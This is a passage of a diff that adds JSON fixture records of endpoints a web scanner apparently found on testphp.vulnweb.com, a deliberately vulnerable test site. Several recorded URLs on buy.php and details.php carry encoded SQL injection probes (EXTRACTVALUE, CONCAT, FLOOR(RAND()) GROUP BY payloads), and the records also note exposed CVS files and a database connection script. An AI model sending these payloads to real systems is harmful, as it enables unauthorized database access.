"http://testphp.vulnweb.com/AJAX/showxml.php", + "content_length": 11, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:21:48.134Z", + "response_time": 0.343482289, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1204, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/AJAX/styles.css", + "content_length": 562, + "page_title": null, + "http_status": 200, + "content_type": "text/css", + "discovered_date": "2024-11-13T02:21:48.341Z", + "response_time": 0.342586972, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1213, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "content_length": 1, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:21:52.158Z", + "response_time": 0.170736832, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1215, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "content_length": 1, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:21:52.343Z", + "response_time": 0.343874951, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1216, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "content_length": 8, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:21:52.438Z", + "response_time": 0.35232314600000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1217, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/CVS/Root", + "content_length": 1, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:21:52.892Z", + "response_time": 0.171753902, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1221, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Connections/DB_Connection.php", + "content_length": 236, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:21:57.140Z", + "response_time": 0.349273232, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1244, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Flash/add.swf", + "content_length": 17418, + "page_title": null, + "http_status": 200, + "content_type": "application/x-shockwave-flash", + "discovered_date": "2024-11-13T02:22:02.745Z", + "response_time": 0.529291964, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1246, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Flash/add.fla", + "content_length": 154624, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:22:03.379Z", + "response_time": 0.869145132, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1249, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "content_length": 975, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:06.757Z", + "response_time": 0.345986274, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1250, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess", + "content_length": 176, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:22:07.477Z", + "response_time": 0.34366091899999995, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1257, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1", + "content_length": 100, + "page_title": null, + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:08.134Z", + "response_time": 0.347460335, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1258, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3", + "content_length": 100, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:08.255Z", + "response_time": 0.34904236, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1259, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "content_length": 100, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:08.370Z", + "response_time": 0.348560557, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1260, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "content_length": 100, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:08.485Z", + "response_time": 0.352843968, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1261, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "content_length": 76, + "page_title": null, + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:08.600Z", + "response_time": 0.342641996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1262, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "content_length": 76, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:08.715Z", + "response_time": 0.357823551, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1263, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "content_length": 76, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:08.831Z", + "response_time": 0.34068832099999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1264, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "content_length": 76, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:08.946Z", + "response_time": 0.354751573, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1265, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "content_length": 93, + "page_title": null, + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:09.074Z", + "response_time": 0.34418431, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1266, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "content_length": 93, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:09.203Z", + "response_time": 0.353294585, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1267, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "content_length": 93, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:09.332Z", + "response_time": 0.347274305, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1268, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "content_length": 93, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:11.907Z", + "response_time": 0.347193246, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1272, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "content_length": 313, + "page_title": null, + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:12.861Z", + "response_time": 0.348610497, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1273, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/1", + "content_length": 313, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:12.993Z", + "response_time": 0.33992036999999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1274, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/1L", + "content_length": 313, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:13.165Z", + "response_time": 0.35825942400000005, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1275, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/A01", + "content_length": 313, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:13.614Z", + "response_time": 0.35688974300000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1276, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/Connection:", + "content_length": 313, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:13.752Z", + "response_time": 0.351822893, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1280, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "content_length": 319, + "page_title": null, + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:17.833Z", + "response_time": 0.353084673, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1287, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "content_length": 279, + "page_title": null, + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:18.714Z", + "response_time": 0.358096073, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1288, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/1", + "content_length": 279, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:18.846Z", + "response_time": 0.3479333, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1289, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/1L", + "content_length": 279, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:18.977Z", + "response_time": 0.353033595, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1290, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/A01", + "content_length": 279, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:19.120Z", + "response_time": 0.35292875700000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1291, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/Connection:", + "content_length": 279, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:19.264Z", + "response_time": 0.36239501, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1292, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.bak.html", + "content_length": 137, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:19.438Z", + "response_time": 0.349661814, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1294, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.html", + "content_length": 100, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:19.688Z", + "response_time": 0.343085327, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1295, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-2.html", + "content_length": 76, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:19.828Z", + "response_time": 0.347018155, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1297, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-3.html", + "content_length": 93, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:22.267Z", + "response_time": 0.352013103, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1299, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php", + "content_length": 6, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:22.516Z", + "response_time": 0.35421692, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1300, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-", + "content_length": 136, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:22.653Z", + "response_time": 0.35097104, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1301, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-1%20AND%20((SELECT%20", + "content_length": 136, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:23.202Z", + "response_time": 0.340619653, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1302, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/buy.php?id=-1%20AND%20((SELECT%201%20FROM%20(SELECT%202", + "content_length": 136, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:23.332Z", + "response_time": 0.34512709999999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1303, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28EXTRACTVALUE%289159%2CCONCAT%280x5c%2C0x7176627671%2C%28SELECT%20%28ELT%289159%3D9159%2C1%29%29%29%2C0x716a627a71%29%29%29", + "content_length": 181, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:23.464Z", + "response_time": 0.354100931, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1304, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28SELECT%20%28CASE%20WHEN%20%284470%3D4470%29%20THEN%200x2d31204f522031372d372533643130%20ELSE%20%28SELECT%206525%20UNION%20SELECT%208527%29%20END%29%29", + "content_length": 47, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:23.964Z", + "response_time": 0.35042451199999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1306, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28SELECT%20CONCAT%280x7176627671%2C%28ELT%289737%3D9737%2C1%29%29%2C0x716a627a71%29%29", + "content_length": 47, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:27.171Z", + "response_time": 0.345212651, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1307, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=%28SELECT%20CONCAT%28CONCAT%280x7176627671%2C%28CASE%20WHEN%20%282186%3D2186%29%20THEN%200x31%20ELSE%200x30%20END%29%29%2C0x716a627a71%29%29", + "content_length": 47, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:27.308Z", + "response_time": 0.35519961899999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1310, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%202979%3D8651", + "content_length": 47, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:28.325Z", + "response_time": 0.34925427600000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1312, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%205213%3D2807%23", + "content_length": 47, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:28.565Z", + "response_time": 0.35300309399999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1316, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%20AND%20ROW%282749%2C8341%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176627671%2C%28SELECT%20%28ELT%282749%3D2749%2C1%29%29%29%2C0x716a627a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%201384%20UNION%20SELECT%201974%20UNION%20SELECT%206255%20UNION%20SELECT%206029%29a%20GROUP%20BY%20x%29", + "content_length": 286, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:29.040Z", + "response_time": 0.362416566, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1343, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=4727", + "content_length": 47, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:39.023Z", + "response_time": 0.349531161, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1346, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/1.jpg", + "content_length": 3551, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:22:39.360Z", + "response_time": 0.34848895900000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1348, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/2.jpg", + "content_length": 2739, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:22:39.546Z", + "response_time": 0.352361457, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1350, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/3.jpg", + "content_length": 3560, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:22:39.730Z", + "response_time": 0.343069796, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1352, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/index.php", + "content_length": 975, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:39.912Z", + 